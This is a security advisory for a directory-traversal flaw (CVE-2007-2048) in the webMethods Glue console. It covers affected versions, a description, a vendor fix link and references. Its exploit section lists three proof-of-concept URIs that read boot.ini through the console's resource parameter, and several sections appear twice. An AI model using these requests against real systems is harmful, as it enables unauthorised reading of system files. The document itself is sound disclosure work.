webMethods Glue Console Directory Traversal Vulnerability
BID:23423
Info
webMethods Glue Console Directory Traversal Vulnerability
| Bugtraq ID: | 23423 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-2048 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 11 2007 12:00AM |
| Updated: | May 07 2007 09:49PM |
| Credit: | Patrick Webster <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
webMethods webMethods Glue 6.5.1 webMethods webMethods Glue 5.0 webMethods webMethods Glue 4.0 webMethods webMethods Glue |
| Not Vulnerable: | |
Discussion
webMethods Glue Console Directory Traversal Vulnerability
webMethods Glue is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer with the privileges of the affected application. Information obtained may aid in further attacks.
This issue affects webMethods Glue 6.5.1; other versions may also be vulnerable.
webMethods Glue is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer with the privileges of the affected application. Information obtained may aid in further attacks.
This issue affects webMethods Glue 6.5.1; other versions may also be vulnerable.
Exploit / POC
webMethods Glue Console Directory Traversal Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com:8080/console?resource=../../../boot.ini
http://www.example.com:8080/console?resource=\boot.ini
http://www.example.com:8080/console?resource=c:\boot.ini
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com:8080/console?resource=../../../boot.ini
http://www.example.com:8080/console?resource=\boot.ini
http://www.example.com:8080/console?resource=c:\boot.ini
Solution / Fix
webMethods Glue Console Directory Traversal Vulnerability
Solution:
The vendor has released updates to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
webMethods webMethods Glue 5.0
Solution:
The vendor has released updates to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
webMethods webMethods Glue 5.0
-
webMethods Glue_5-0-2_Fix3.zip
http://www.webmethods.com/dnld/Glue_5-0-2_Fix3.zip
References
webMethods Glue Console Directory Traversal Vulnerability
References:
References:
- webMethods Home Page (webMethods)
- Updated: webMethods Security Advisory: Glue console directory traversal vulnerab (webMethods)
- webMethods Glue Management Console Directory Traversal ("Patrick Webster"
) - webMethods Security Advisory: Glue console directory traversal vulnerability (Jeremy Epstein
)